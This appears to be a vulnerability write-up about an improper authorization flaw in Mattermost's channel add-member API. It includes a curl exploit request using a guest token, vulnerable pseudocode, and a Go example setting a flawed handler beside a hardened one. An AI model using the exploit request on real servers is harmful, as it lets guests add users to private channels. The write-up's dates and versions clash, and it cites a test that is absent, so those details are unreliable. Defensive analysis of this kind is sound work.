How the mentioned CVE works
This CVE concerns an improper authorization check in the Mattermost `POST /api/v4/channels/{channel_id}/members` endpoint. The endpoint verifies that the user making the API call is a member of the target private channel, but it does not validate the type (role) of that user. A guest user who is a member of the channel therefore passes the membership check, and the server proceeds to add the members named in the request payload. The critical flaw is that the permission check for the "add member" action is skipped or bypassed for guest users. Consequently, a guest user, who should have only limited permissions, can add any user from the team to the private channel, violating the intended security model and escalating their own privileges within the channel's context.
Platform: Mattermost
Version: 10.5.x <= 10.5.10, 10.11.x <= 10.11.2
Vulnerability: Improper Access Control
Severity: Critical
Date: 2024
Prediction: Expected Patch Q1 2024
What Undercode Say:
curl -X POST "https://TARGET/api/v4/channels/CHANNEL_ID/members" \
-H "Authorization: Bearer GUEST_USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"user_id": "VICTIM_USER_ID"}'
// Pseudocode of the vulnerable function
func AddChannelMember(c Context, channelId string, userToAddId string) {
    // Checks only whether the requester is a channel member -> PASS (a guest is a member)
    if !isUserInChannel(c.AppContext.Session().UserId, channelId) {
        c.Err = model.NewAppError("...", "api.channel.add_member.missing_user...", nil, "", http.StatusBadRequest)
        return
    }
    // MISSING: authorization check for the requester's role (guest) here.
    // Adds the user without a sufficient privilege check.
    addUserToChannel(userToAddId, channelId)
}
How the exploit works:
The guest user authenticates. The attacker calls the add-member API, specifying the target user. The system adds the user successfully.
Protection from this CVE
Upgrade Mattermost to a patched version. Apply the provided patches. Review guest permissions.
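The following Go program is an added example, not Mattermost's code and not the pseudocode above: it models the flaw described in this post (membership checked, requester role not checked) beside a hardened version of the same handler that adds a role-based permission check before touching channel membership. The user, channel and team types, the role names `system_user` and `system_guest`, the permission name `manage_private_channel_members`, the fixture data and the additional "target must already be in the team" check are all assumptions made for this example.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Minimal in-memory model, constructed for this example (not Mattermost's types).
type User struct {
	ID    string
	Roles string // space-separated role names, e.g. "system_user" or "system_guest"
}

type Channel struct {
	ID      string
	TeamID  string
	Private bool
	Members map[string]bool // userID -> is member
}

type Store struct {
	Users       map[string]*User
	Channels    map[string]*Channel
	TeamMembers map[string]map[string]bool // teamID -> userID -> is member
}

// Permission name and role-to-permission mapping are assumed and simplified here.
const PermissionManagePrivateChannelMembers = "manage_private_channel_members"

var rolePermissions = map[string][]string{
	"system_user":  {PermissionManagePrivateChannelMembers},
	"system_guest": {}, // guests may read and post, but never manage membership
}

var (
	ErrChannelNotFound = errors.New("channel not found")
	ErrUserNotFound    = errors.New("user not found")
	ErrNotMember       = errors.New("requester is not a member of the channel")
	ErrForbidden       = errors.New("requester lacks permission to add members")
	ErrTargetNotInTeam = errors.New("target user is not a member of the channel's team")
)

// HasPermission reports whether any of the user's roles grants the permission.
func HasPermission(u *User, perm string) bool {
	for _, role := range strings.Fields(u.Roles) {
		for _, p := range rolePermissions[role] {
			if p == perm {
				return true
			}
		}
	}
	return false
}

// AddChannelMemberVulnerable mirrors the flaw: membership is checked, the role is not.
func AddChannelMemberVulnerable(s *Store, requesterID, channelID, targetID string) error {
	ch, ok := s.Channels[channelID]
	if !ok {
		return ErrChannelNotFound
	}
	if !ch.Members[requesterID] {
		return ErrNotMember
	}
	// No permission check: a guest member reaches this line and can add anyone.
	ch.Members[targetID] = true
	return nil
}

// AddChannelMemberHardened adds the authorization step the vulnerable path skips.
func AddChannelMemberHardened(s *Store, requesterID, channelID, targetID string) error {
	ch, ok := s.Channels[channelID]
	if !ok {
		return ErrChannelNotFound
	}
	requester, ok := s.Users[requesterID]
	if !ok {
		return ErrUserNotFound
	}
	if !ch.Members[requesterID] {
		return ErrNotMember
	}
	// Role-based permission check, evaluated independently of channel membership.
	if ch.Private && !HasPermission(requester, PermissionManagePrivateChannelMembers) {
		return ErrForbidden
	}
	// Assumed extra guard: the target must already belong to the channel's team.
	if !s.TeamMembers[ch.TeamID][targetID] {
		return ErrTargetNotInTeam
	}
	ch.Members[targetID] = true
	return nil
}

// NewSampleStore builds constructed fixture data: one team, one private channel,
// a regular member, a guest member, and a team member who is not in the channel.
func NewSampleStore() *Store {
	return &Store{
		Users: map[string]*User{
			"alice": {ID: "alice", Roles: "system_user"},
			"guest": {ID: "guest", Roles: "system_guest"},
			"bob":   {ID: "bob", Roles: "system_user"},
		},
		Channels: map[string]*Channel{
			"priv1": {ID: "priv1", TeamID: "team1", Private: true,
				Members: map[string]bool{"alice": true, "guest": true}},
		},
		TeamMembers: map[string]map[string]bool{
			"team1": {"alice": true, "guest": true, "bob": true},
		},
	}
}

func main() {
	fmt.Println("vulnerable, guest adds bob:", AddChannelMemberVulnerable(NewSampleStore(), "guest", "priv1", "bob"))
	h := NewSampleStore()
	fmt.Println("hardened, guest adds bob:  ", AddChannelMemberHardened(h, "guest", "priv1", "bob"))
	fmt.Println("hardened, alice adds bob:  ", AddChannelMemberHardened(h, "alice", "priv1", "bob"))
}
```

The point of the hardened handler is that "is a member" and "may manage members" are two separate questions: the first is answered by a membership lookup, the second by the requester's role, and the handler must refuse before mutating state if either answer is no. A regression test that exercises the guest path against a private channel (as the test here does) is the cheapest way to keep this check from being lost in a refactor.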
Impact:
Privilege Escalation. Data Exposure. Policy Bypass.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode